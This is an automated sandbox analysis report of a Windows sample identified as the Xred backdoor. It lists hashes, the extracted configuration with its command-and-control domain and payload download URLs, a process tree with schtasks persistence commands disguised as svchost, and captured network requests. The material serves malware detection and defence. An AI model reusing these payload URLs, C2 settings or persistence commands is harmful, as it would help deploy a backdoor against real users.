Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/11/2024, 01:13 UTC

General

  • Target

    805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe

  • Size

    3.3MB

  • MD5

    e3a3e6d5bcdf3fe8c6c525429e401b1f

  • SHA1

    a1b2370bd81715b63dd6268e301a7101d39d3ebc

  • SHA256

    805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299

  • SHA512

    be86d4785df2de0b0f4e74c9f56988d7df0dc6ed2bd2d2632b83266a73ed72491b50a3db557d83ce5cca65ed1b98c97d6c63a90045188896b02d2fa3484e8743

  • SSDEEP

    98304:dnsmtk2a9XzhW148Pd+Tf1mpcOldJQ3/VL4:BL6FK4s0TfLOdo/K

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Xred

    Xred is a backdoor written in Delphi.

  • Xred family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 13 IoCs
  • Themida packer 26 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe
    "C:\Users\Admin\AppData\Local\Temp\805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:3000
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2692
        • \??\c:\users\admin\appdata\local\temp\._cache_synaptics.exe 
          c:\users\admin\appdata\local\temp\._cache_synaptics.exe  InjUpdate
          4⤵
          • Executes dropped EXE
          PID:2320
        • C:\Windows\Resources\Themes\icsys.icn.exe
          C:\Windows\Resources\Themes\icsys.icn.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2628
          • \??\c:\windows\resources\themes\explorer.exe
            c:\windows\resources\themes\explorer.exe
            5⤵
            • Modifies visibility of hidden/system files in Explorer
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1388
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe SE
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1648
              • \??\c:\windows\resources\svchost.exe
                c:\windows\resources\svchost.exe
                7⤵
                • Modifies visibility of hidden/system files in Explorer
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Drops file in System32 directory
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1188
                • \??\c:\windows\resources\spoolsv.exe
                  c:\windows\resources\spoolsv.exe PR
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2268
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:15 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1832
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:16 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:888
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:17 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1580
            • C:\Windows\Explorer.exe
              C:\Windows\Explorer.exe
              6⤵
                PID:536
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2600

    Network

    • flag-us
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-us
      DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • flag-us
      GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 27 Nov 2024 01:13:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • flag-us
      DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      142.250.187.206
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-kRfI6R5rNWHOaFsU_-UVkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-qkF4u-n4J92zeZ7tikG7vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:53 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: script-src 'report-sample' 'nonce-F6AKXPnDYcHmb7BKqdsing' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      c.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.3
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /r/r1.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: c.pki.goog
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 854
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Wed, 27 Nov 2024 00:50:22 GMT
      Expires: Wed, 27 Nov 2024 01:40:22 GMT
      Cache-Control: public, max-age=3000
      Age: 1469
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Content-Type: application/pkix-crl
      Vary: Accept-Encoding
    • flag-us
      DNS
      o.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      o.pki.goog
      IN A
      Response
      o.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.3
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 471
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Wed, 27 Nov 2024 01:11:49 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 182
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Wed, 27 Nov 2024 00:34:01 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 2451
    • flag-us
      DNS
      drive.usercontent.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      drive.usercontent.google.com
      IN A
      Response
      drive.usercontent.google.com
      IN A
      142.250.179.225
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Security-Policy: script-src 'report-sample' 'nonce-2FLHKmB57GkpiHpwLO9v5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC7b28XIzOqUeyNtiimLtgQGONUMafXlXVgJi1CpG5H3J7X7RaVJVjxrKvCLAzhFRkTOHCVQO6nCaQ
      Server: UploadServer
      Set-Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw; expires=Thu, 29-May-2025 01:14:52 GMT; path=/; domain=.google.com; HttpOnly
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: drive.usercontent.google.com
      Cache-Control: no-cache
      Connection: Keep-Alive
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-6gB_jJxJFIFm1a4EKFiujA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC6hlrvb0nWEJCLjaypQJ2H9ytuVeaP1p2_0bVBWj6lV4wTLFo9G8swGYYtQmzR4v_lGs2qgWyNf7A
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: drive.usercontent.google.com
      Cache-Control: no-cache
      Connection: Keep-Alive
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:53 GMT
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-fPXZ79WXvdhXQdwBotrhvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC63ouSAW91nL_sUJ6iQPJQBSeb6HIKjj_yfEXQOE0oETF-sgnmlogP5R6xK4_iE6r-CN-s6_kapMg
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-us
      DNS
      crl.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      crl.microsoft.com
      IN A
      Response
      crl.microsoft.com
      IN CNAME
      crl.www.ms.akadns.net
      crl.www.ms.akadns.net
      IN CNAME
      a1363.dscg.akamai.net
      a1363.dscg.akamai.net
      IN A
      88.221.134.83
      a1363.dscg.akamai.net
      IN A
      88.221.134.146
    • flag-gb
      GET
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      Remote address:
      88.221.134.83:80
      Request
      GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1036
      Content-Type: application/octet-stream
      Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
      Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
      ETag: 0x8DCDDD1E3AF2C76
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 37b0a847-001e-003a-4dc7-0f4d92000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 27 Nov 2024 01:15:22 GMT
      Connection: keep-alive
    • flag-us
      DNS
      www.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      95.100.245.144
    • flag-gb
      GET
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      Remote address:
      95.100.245.144:80
      Request
      GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: www.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1078
